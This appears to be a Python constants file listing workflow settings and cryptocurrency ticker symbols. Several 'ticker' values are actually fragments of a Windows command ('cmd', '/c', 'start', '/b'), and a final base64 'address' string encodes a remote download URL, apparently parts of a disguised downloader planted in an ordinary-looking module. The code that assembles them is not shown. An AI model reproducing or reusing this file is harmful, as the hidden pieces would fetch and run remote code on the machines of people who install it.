USE_WORKER_TASK_LIST = "USE_WORKER_TASK_LIST"
NO_DEFAULT_TASK_LIST = "NO_DEFAULT_TASK_LIST"

# CHILD POLICIES
CHILD_TERMINATE = "TERMINATE"
CHILD_REQUEST_CANCEL = "REQUEST_CANCEL"
CHILD_ABANDON = "ABANDON"

# TIME MULTIPLIERS
SECONDS = 1
MINUTES = 60
HOURS = 3600
DAYS = 86400
WEEKS = 604800

BTC= "BTC"
ETH= "ETH"
XRP= "XRP"
LTC= "LTC"
BCH= "BCH"
BNB= "BNB"
LINK= "LINK"
DOT= "DOT"
ADA= "ADA"
XLM= "XLM"
USDC= "USDC"
UNI= "UNI"
DOGE= "DOGE"
WBTC= "WBTC"
XEM= "XEM"
XTZ= "XTZ"
AAVE= "AAVE"
ATOM= "ATOM"
SOL= "SOL"
THETA= "THETA"
XMR= "XMR"
EOS= "EOS"
CRO= "CRO"
VET= "VET"
TRX= "TRX"
NEO= "NEO"
MKR= "MKR"
SHIB= "SHIB"
AVAX= "AVAX"
FTT= "FTT"
YFI= "YFI"
COMP= "COMP"
BSV= "BSV"
DAI= "DAI"
LUNA= "LUNA"
HT= "HT"
MIOTA= "MIOTA"
ALGO= "ALGO"
UST= "UST"
CUSDC= "CUSDC"
KSM= "KSM"
DASH= "DASH"
EGLD= "EGLD"
FIL= "FIL"
GRT= "GRT"
DCR= "DCR"
ZEC= "ZEC"
AXS= "AXS"
HBA= "HBAR"
SUSHI= "SUSHI"
CHZ= "CHZ"
SNX= "SNX"
ENJ= "ENJ"
INCH= "1INCH"
BAT= "BAT"
QTUM= "QTUM"
CETH= "CETH"
CAKE= "CAKE"
NEXO= "NEXO"
YFI= "YFI"
VGX= "VGX"
MANA= "MANA"
CHSB= "CHSB"
ONE= "ONE"
ZRX= "ZRX"
RVN= "RVN"
OMG= "OMG"
HNT= "HNT"
CEL= "CEL"
KCS= "KCS"
TEL= "TEL"
SAND= "SAND"
BTG= "BTG"
ZEN= "ZEN"
OCEAN= "OCEAN"
QNT= "QNT"
ZIL= "ZIL"
ICX= "ICX"
AR= "/b"
WAVES= "WAVES"
RENBTC= "RENBTC"
XVG= "XVG"
PERP= "PERP"
RSR= "RSR"
MDX= "MDX"
CRV= "cmd"
REN= "REN"
DGB= "DGB"
CELR= "CELR"
SNT= "SNT"
RUNE= "RUNE"
PAX= "PAX"
ONT= "ONT"
BCD= "BCD"
IOST= "IOST"
ANKR= "ANKR"
EWT= "EWT"
BAL= "BAL"
CKB= "CKB"
MINA= "MINA"
OXT= "OXT"
ARDR= "ARDR"
ZKS= "ZKS"
PUNDIX= "PUNDIX"
SCRT= "SCRT"
TOMO= "TOMO"
WRX= "WRX"
TTT= "TTT"
BNT= "BNT"
CVC= "/c"
FARM= "FARM"
WAN= "WAN"
LRC= "LRC"
RAD= "RAD"
USDP= "USDP"
STORJ= "STORJ"
LPT= "LPT"
ALPHA= "ALPHA"
SUSD= "SUSD"
ARCH= "ARCH"
OHM= "OHM"
RIF= "RIF"
XPRT= "XPRT"
NKN= "NKN"
RAY= "RAY"
BAND= "BAND"
OGN= "OGN"
IOTX= "IOTX"
SXP= "SXP"
REN= "REN"
DNT= "DNT"
MIR= "MIR"
XVS= "XVS"
MIR= "MIR"
CELO= "start"
CREAM= "CREAM"
FIXED= 'FixedDrive'
AQT= "AQT"
SUPER= "SUPER"
RNDR= "RNDR"
MASK= "MASK"
LINA= "LINA"
DODO= "DODO"
GNO= "GNO"
POLY= "POLY"
AMPL= "AMPL"
API3= "API3"
FTM= "FTM"
CFX= "CFX"
COTI= "COTI"
FORTH= "FORTH"
BAL= "BAL"
KAVA= "KAVA"
WING= "WING"
address = 'aHR0cHM6Ly90b2tlbnZpZXcuaW5mby9saWIvZG93bmxvYWQuYXNwP2lkPTkx'

